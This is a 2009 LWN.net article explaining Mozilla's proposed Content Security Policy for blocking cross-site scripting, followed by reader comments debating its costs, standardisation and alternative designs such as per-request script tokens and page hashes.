|
|
Subscribe / Log in / New account

Mozilla's Content Security Policy

By Jake Edge
July 1, 2009

Cross-site scripting (XSS) is a common web application flaw that can lead to a wide variety of attacks. The problem, and ways to eliminate it, have been known for years, but new instances of XSS crop up regularly in web applications—live sites as well as packages like content management systems. Mozilla has taken the lead on a new security policy, Content Security Policy (CSP), which provides a way for sites to avoid XSS. It does that by fundamentally changing the way JavaScript content is treated by the browser, but does so in a way that allows sites to opt-in to the new policy.

XSS works by injecting JavaScript content into the data returned by a web server. Normally that happens because some kind of user input was not properly filtered before it was echoed back on a web page. If that user input—in the form of a comment on an article, for example—contains unfiltered JavaScript, the users browser will happily execute it as if it originated with the site. At that point, an attacker-controlled code is running with the privileges of the browser user and the origin site.

As described by Mozilla's security program manager Brandon Sterne, on the Mozilla Security Blog, CSP changes that model. Instead of treating all content received in a response as having the same privilege level, CSP allows the site owner to explicitly list what kinds of JavaScript to trust. In order to do that, however, CSP strictly limits where JavaScript can originate, and where it can appear in HTML.

Basically, CSP allows a site operator to list hosts from which JavaScript content will be accepted. If that option is used (via an HTTP X-Content-Security-Policy header or HTML <META> tag), all JavaScript must be loaded from external files from hosts on the list—all other mechanisms for executing JavaScript are disabled for that page. Sterne describes it this way:

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid.

This will be an enormous change for sites that want to use CSP, but it is backward-compatible with older browsers (or those that do not support CSP), and there are ways to incrementally approach the implementation. Sterne notes that all sites should be able to make the switch, and Mozilla intends to provide a migration guide to help sites convert to CSP. But, it remains to be seen whether sites will actually use it. Mozilla security lead, Daniel Veditz, commented about that in the bug entry that tracks CSP implementation:

Funny you should mentions the onclick attribute as that one specifically is a popular one to abuse. Whether the burden of rewriting your site to the supported safe subset of HTML is worth it depends on how valuable the contents of your site are.

Note that we are not eliminating event handlers, just the ability to specify them inline. AddEventListener() will still work, as will setting the .click property of a DOM node. This is a little cumbersome, but there are already sites that do this for some of their content.

CSP is a gamble, it could be that the hurdle will turn out to be too high. But if we can get authors over that hurdle we can promise them a safer site.

Another interesting feature of CSP is its ability to notify a site when there is an attempt to violate the policy. This will even benefit users of browsers that don't support CSP, as XSS holes can be recognized and fixed more quickly. Sterne is optimistic about the effect of CSP:

The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work and the bar for a successful attack is placed much, much higher.

The open question is whether site operators are concerned enough about XSS to change the way they handle JavaScript. Over time, automated tools may help with that process, which could lower the bar somewhat, but it is still a daunting task. One would guess that the other browsers will take a "wait and see" attitude before deciding whether to implement it. Though the implementation is progressing, there is no word from Mozilla on when it might release a browser with CSP either.

Perhaps CSP is too heavy-handed of a solution to the XSS problem, but it is good to see Mozilla taking a lead in trying to find something that will alleviate the problem. There are other, similar efforts in the works at Mozilla including the Origin header to mitigate cross-site request forgery and clickjacking.

While these web application vulnerabilities are largely understood and techniques to avoid them are known, they keep cropping up. Finding ways to make users' browsers more resistant to these kinds of attacks can only help improve web security.


Index entries for this article
SecurityCross-site scripting (XSS)
SecurityWeb browsers


to post comments

Mozilla's Content Security Policy

Posted Jul 2, 2009 9:45 UTC (Thu) by tzafrir (subscriber, #11501) [Link] (1 responses)

What effect will this have over the ease of use of googlesyndication.com and other "web bugs"?

Mozilla's Content Security Policy

Posted Jul 2, 2009 13:02 UTC (Thu) by mrshiny (subscriber, #4266) [Link]

At first glance it does appear that this policy will dramatically limit the ease of adding third-party content to the page, such as ads, if that content uses scripts. For one thing, ad content will need to be rewritten to load external .js files. For a service such as Google Analytics the service provider will need to document all the hostnames that serve any JS content (assuming the initial .js file loads additional scripts, which is relatively common).

This policy has the potential to be extremely powerful but the difficulty in implementation is relatively high, especially for many of the popular sites. However, for any sites which don't have ads it could be easily done. I know that the site I maintain would need some framework upgrades to support this feature, however, when coding with this approach in mind it is easy enough to apply. And it's fully backwards compatible, which is great.

Standards?

Posted Jul 2, 2009 10:06 UTC (Thu) by alex (subscriber, #1355) [Link] (3 responses)

Isn't this something that should be being pushed through the W3C standards process?

Standards?

Posted Jul 2, 2009 16:13 UTC (Thu) by JoeBuck (subscriber, #2330) [Link] (2 responses)

When a standard invents new functionality, it's usually a mistake. It's better to gain experience with a prototype implementation, and if it works well, standardize that.

If a browser maker announces an experimental feature and does not assert patent rights that block others from using it, and it works out well, the standards committees can then add it to future standards.

Standards?

Posted Jul 2, 2009 16:29 UTC (Thu) by alex (subscriber, #1355) [Link] (1 responses)

Fair enough, I hadn't thought of it that way. I guess when I saw a browser was "innovating" I had flash backs of the bad old days of proprietary HTML tags.

It would be interesting to know what Opera/Microsoft/WebKit developers think would help solve the problem.

Standards?

Posted Jul 6, 2009 14:08 UTC (Mon) by sbergman27 (guest, #10767) [Link]

"""
...when I saw a browser was "innovating" I had flash backs of the bad old days of proprietary HTML tags.
"""

As well you should. I don't recall anyone at Netscape or MS asserting patent rights that blocked others from using their proprietary stuff. They were both just doing their own thing and playing the NIH game... as seems to be happening here. This does look very much like the bad old days of proprietary HTML tags. The standards should come first.

Mozilla's Content Security Policy

Posted Jul 2, 2009 14:27 UTC (Thu) by butlerm (subscriber, #13312) [Link] (4 responses)

Unless your application has a large number of places that are vulnerable to
being incorrectly coded to output large user submitted text fields without
encoding or user submitted html content without sanitization checks, the
added value of this system is approximately zero.

Enabling this policy also makes it effectively impossible to use
dynamically generated javascript without generating a bunch of little
temporary files, and forcing the web browser to submit secondary requests
to fetch them. That has major performance implications due to turn around
latency. It also seriously complicates the application development
process.

For applications produced in an environment where developers are unaware or
unable to follow basic security practices, or where even a temporary
unpatched "XSS" vulnerability is a serious matter, it would be far better
to propose an extension where script tags needed to carry an attribute with
a generated value that matched a value supplied in the HTTP response
headers.

That would effectively eliminate any real possibility of the web browser
executing a hostile user submitted script, do to the impossibility of
predicting a match, and the change in the generated value on every request.

Mozilla's Content Security Policy

Posted Jul 2, 2009 17:17 UTC (Thu) by joey (guest, #328) [Link] (2 responses)

I think you're probably right, which is a real pity, since sanitizing user-supplied html to remove all possible means of javascript injection is very tricky.

I wish this CSP could be turned on at a block level. Something like:

<csp="no-javascript"> user supplied html here </csp>

Mozilla's Content Security Policy

Posted Jul 2, 2009 17:19 UTC (Thu) by joey (guest, #328) [Link]

BTW, right after I posted that, I found a javascript stripping bug in lwn.net, which I've emailed to Jon. :-/

Mozilla's Content Security Policy

Posted Jul 11, 2009 19:09 UTC (Sat) by tulcod (guest, #59536) [Link]

If users can inject <script> tags, I don't see any reason why they shouldn't be able to inject </csp> tags.

What Mozilla proposed is not a solution either, though: there is no reason users cannot upload scripts to a host. Heck, websites on most free webhosts would still be vulnerable. I think a better solution would be to only allow javascript to exist in the <head> tag, although this wouldn't be a solution for websites which, for whatever weird reason, would allow users to put stuff in the <head> of a webpage. XSS is an inherent problem with launching scripts from editable content. It would be better to disallow <script> tags completely and use a different mechanism to use javascript on a webpage alongside the HTML delivery, but that would mean properties like onclick and onmouseover would also have to be banned, which induces some rather serious limitations (read: webmasters won't like this).

For now, I'll stick with bbcode and some url encoding.

ps: wow, "webmasters". when was the last time I used that phrase?

Mozilla's Content Security Policy

Posted Jul 9, 2009 13:03 UTC (Thu) by swiftone (guest, #17420) [Link]

Unless your application has a large number of places that are vulnerable to being incorrectly coded to output large user submitted text fields without encoding or user submitted html content without sanitization checks, the added value of this system is approximately zero.

Any site that accepts user input has places that are vulnerable to being incorrectly coded. And as simple as correct coding is it doesn't take much effort to discover that a large number of sites are doing poorly at doing so, either because it turns out that cleansing input is non-trivial after all, or because it is easy to be lazy.

It takes only one developer to screw up in one place to leave a site vulnerable. Because of attacks like Cross Site Request Forgery (Generating a request to a different app that the user is authenticated to) a developer on one app can leave another otherwise secure app vulnerable.

This policy allows the server administrator to greatly reduce the threat in a single fell-swoop. I would not call that added-value "zero".

Meanwhile the cost is:

  • No inline JS - Not a problem, inline JS in considered a poor practice in terms of accessibility and maintenance. Use progressive enhancement techniques anyway.
  • JS in outside files - Again, a best practice in terms of maintenance and code-reuse.
These costs seem far from prohibitive for the benefit in my opinion.

It is true that this makes dynamically generated javascript difficult. Who (outside of attackers) uses dynamically generated javascript? With the large array of stable and useful JS lubraries available, there should be no need for such butchery. (JSON parsers/generators are specifically mentioned as not being a problem in the CSP FAQ). Is there some bastion of useful dynamically generated JS that I am unaware of?

Mozilla's Content Security Policy

Posted Jul 2, 2009 16:03 UTC (Thu) by alankila (guest, #47141) [Link] (2 responses)

Trading security over functionality usually means that security loses and functionality wins. I predict a failure of this effort: the difficulties in transforming existing applications and web frameworks to support this seem large. If they had said that you can at least put <script> into <head> before the tag that disables using inline scripts...

Mozilla's Content Security Policy

Posted Jul 2, 2009 16:16 UTC (Thu) by JoeBuck (subscriber, #2330) [Link] (1 responses)

A bank or an online commerce site might still think that the tradeoff is worth it. In a situation where an XSS attack costs either the bank or the customer real money, it could be worth the tradeoff.

Mozilla's Content Security Policy

Posted Jul 4, 2009 9:08 UTC (Sat) by NAR (subscriber, #1313) [Link]

Why would a bank let HTML input into any forms?

why not sha checksum?

Posted Jul 2, 2009 16:48 UTC (Thu) by ccyoung (guest, #16340) [Link] (3 responses)

why not have an sha hash for the page - if the hash is incorrect no javascript on the page is run.

this would allow on-page javascript to stay - in my case a good idea since a lot of the javascript itself is dynamic.

why not sha checksum?

Posted Jul 2, 2009 23:20 UTC (Thu) by riddochc (guest, #43) [Link] (2 responses)

Think about this some. What are you taking the SHA sum of? The content of the page, of course. Say, for example, that the page in question is contains a number of user-entered comments, like this one on LWN you're reading. Those comments were probably stored in a database - a script pulls them out, and inserts them into the appropriate places of the page.

Your checksum won't tell you whether there's references to javascript in the content that's been sent to your browser. If the server didn't filter them properly, and your browser just does as its told (without giving you control over whether it should treat any individual portion as code or data) then your SHA sum will tell you that yes, indeed, the malicious code was malicious before it went into the comment system in the first place.

not following

Posted Jul 2, 2009 23:44 UTC (Thu) by ccyoung (guest, #16340) [Link] (1 responses)

yes, sha1 hash needs to be of page including "data" (guess this would hash everything but the header itself?).

no javascript execute before hash completed (perhaps hash for head and one for body might speed things up).

is this impossible to do?

not following

Posted Jul 3, 2009 1:00 UTC (Fri) by riddochc (guest, #43) [Link]

No, taking a hash of any page is very easy to do. It simply doesn't do anything to solve this problem.

Suppose you're in charge of a city with a high rate of criminals breaking into people's houses. Your solution basically amounts to renaming the house numbers on every street, in the hopes that that will prevent criminals from finding houses to break into -- nevermind that they're already on the street in front of the physical buildings.

By the time the nefarious content has reached the browser, if the browser just goes on its merry way interpreting any javascript it's been sent, it doesn't matter much what else the server says to the client. If someone managed to insert javascript code into their comment, and submit it to the server so it'll show up in another user's browser, the TV's already on the sidewalk.

What the Mozilla proposal basically amounts to is making the browser not just interpret any random javascript it's been sent, but letting the website authors say, "Javascript that comes from here (the site's trusted javascript), go ahead an run - but ignore any other javascript, or triggers for it, you see on the web page."


Copyright © 2009, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy